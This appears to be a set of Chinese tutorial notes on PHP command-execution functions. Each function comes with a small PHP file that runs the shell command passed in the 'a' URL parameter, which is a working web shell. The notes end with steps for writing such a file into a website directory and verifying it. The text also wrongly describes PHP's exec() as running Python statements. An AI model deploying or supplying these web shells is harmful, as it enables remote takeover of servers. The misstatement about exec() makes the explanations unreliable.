system()
文件命名为system.php
<?php
if(isset($_GET['a'])){
system($_GET['a']);
}
else{
echo "Please input a";
}
?>
exec ()执行储存在字符串或文件中的 Python 语句,相比于 eval,exec可以执行更复杂的 Python 代码。
文件命名为exec.php
<?php
if(isset($_GET['a'])){
echo exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
shell_exec()
文件命名为shell_exec.php
<?php
if(isset($_GET['a'])){
echo shell_exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
passthru()
文件命名为passthru.php
<?php
if(isset($_GET['a'])){
passthru($_GET['a']);
}
else{
echo "Please input a";
}
?>
popen()
文件命名为popen.php
<?php
if(isset($_GET['a'])){
popen("whoami >> 1.txt",'r');
}else{
echo "Please input a";
}
?>
编写1.txt文档
文件命名为fdyh.php
<?php
if(isset($_GET['a'])){
echo `whoami`;
}else{
echo "Please input a";
}
?>
找到网站目录
进行代码写入
进行验证